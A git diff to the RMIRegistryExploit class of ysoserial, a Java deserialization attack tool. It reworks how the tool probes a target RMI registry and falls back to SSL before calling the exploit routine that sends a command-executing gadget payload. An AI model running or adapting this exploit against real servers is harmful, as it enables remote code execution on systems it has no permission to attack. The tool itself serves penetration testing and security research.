diff --git a/src/main/java/ysoserial/exploit/RMIRegistryExploit.java b/src/main/java/ysoserial/exploit/RMIRegistryExploit.java index a8c350c4..8f7e59ab 100644 --- a/src/main/java/ysoserial/exploit/RMIRegistryExploit.java +++ b/src/main/java/ysoserial/exploit/RMIRegistryExploit.java @@ -1,16 +1,24 @@ package ysoserial.exploit; +import java.io.DataInputStream; import java.io.IOException; import java.net.Socket; -import java.rmi.ConnectIOException; import java.rmi.Remote; +import java.rmi.UnmarshalException; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; import java.rmi.server.RMIClientSocketFactory; +import java.rmi.server.RemoteObject; +import java.rmi.server.UID; import java.security.cert.X509Certificate; import java.util.concurrent.Callable; -import javax.net.ssl.*; - +import javax.net.ssl.SSLContext; +import javax.net.ssl.SSLSocketFactory; +import javax.net.ssl.TrustManager; +import javax.net.ssl.X509TrustManager; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.StreamRemoteCall; import ysoserial.payloads.CommonsCollections1; import ysoserial.payloads.ObjectPayload; import ysoserial.payloads.ObjectPayload.Utils; @@ -55,11 +63,28 @@ public static void main(final String[] args) throws Exception { final Class payloadClass = (Class) Class.forName(className); // test RMI registry connection and upgrade to SSL connection on fail - try { - registry.list(); - } catch(ConnectIOException ex) { - registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory()); - } + UnicastRef unicastRef = null; + StreamRemoteCall streamRemoteCall = null; + try { + RemoteObject remoteObject = (RemoteObject) registry; + unicastRef = (UnicastRef) remoteObject.getRef(); + LiveRef ref = unicastRef.getLiveRef(); + streamRemoteCall = new StreamRemoteCall(ref.getChannel().newConnection(), ref.getObjID(), 1, 4905912898345647071L); + streamRemoteCall.releaseOutputStream(); + DataInputStream var3 = new DataInputStream(streamRemoteCall.getConnection().getInputStream()); + byte code = var3.readByte(); + if (code != 81) { + throw new UnmarshalException("Transport return code invalid"); + } + streamRemoteCall.getInputStream().readByte(); + UID.read(streamRemoteCall.getInputStream()); + } catch (IOException ex) { + registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory()); + } finally { + if (unicastRef != null && streamRemoteCall != null) { + unicastRef.done(streamRemoteCall); + } + } // ensure payload doesn't detonate during construction or deserialization exploit(registry, payloadClass, command);